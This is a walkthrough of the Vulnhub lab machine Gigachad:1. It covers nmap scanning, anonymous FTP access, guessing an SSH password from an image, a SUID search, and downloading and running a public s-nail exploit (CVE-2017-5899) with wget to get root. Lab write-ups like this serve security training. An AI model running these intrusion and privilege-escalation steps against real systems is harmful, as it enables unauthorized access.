Gigachad : 1 Vulnhub Walkthrough

This is a writeup for the Vulnhub Machine : Gigachad:1 which was released by tasiyanci

Level : Beginner / Intermediate

Goal: Find user flag and root flag

Machine Discovery :

First we will use nmap -sn 192.168.1.0/24 to discover the machine in your network. (I have assigned an IP of 192.168.1.0/24 range to my machine)

Port Scanning:

Once the machine is discovered, we will do a port scan using nmap

nmap -A -T4 -p- 192.168.1.5

nmap -T4 -A -p- 192.168.1.5

Exploiting User Flag:

We discovered three open ports which are FTP(21), SSH (22) and HTTP(80)

We can start by Port 80, but there is nothing on the website

We can see that for FTP, anonymous login is allowed. Hence we will try logging in to FTP

ftp 192.168.1.5

Username will be anonymous and password will be blank(press enter at password prompt)

We will use dir or ls command to view the files. As you can see we have found a file called chadinfo

ftp 192.168.1.5

We will download the file using get command

get chadinfo

Now lets open the file using cat

cat chadinfo

We got the username as chad and for password they have given us the directory /drippinchad.png. Lets check it out

After opening http://192.168.1.5/drippinchad.png in browser, we get the below page

http://192.168.1.5/drippinchad.png

According to the caption the password must be related to the place in the picture. If you know this place then skip the below steps. If you don’t know then we will download the image and do a reverse image lookup on Google

Go to Google Images and the click on the Camera Icon

Now browse the files and insert your image

You will see some links which shows this place

I followed the second link and then found that the name is Maiden’s tower

We had discovered Port 22 (SSH) open so we will login with user chad (which we got from the chadinfo file) and we will guess the password something related to Maiden’s tower

After guessing for sometime, I found that the password is maidenstower

So we will login into SSH with username:chad and password:maidenstower

ssh chad@192.168.1.5

ssh chad@192.168.1.5

After doing ls we got our user flag user.txt

cat user.txt

Exploiting Root Flag:

For escalating privileges, we can try by finding sudo permissions for user chad.

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

After researching the services, I found s-nail service which is used for mails. It also has privilege escalation exploits available with CVE-2017–5899

I used the below Github exploit as the payload

In the Home directory, download the exploit.sh using wget

wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh

wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh

Now we will give executable permissions to our exploit.sh using chmod

chmod 777 exploit.sh

And then we will run the exploit

./exploit.sh

./exploit.sh

We will get a Success message and we will get our root shell

Go to /root directory and we got our last flag which is the root flag root.txt !

cat root.txt

Thanks for reading! :)

Please let me know if you have any queries or suggestions.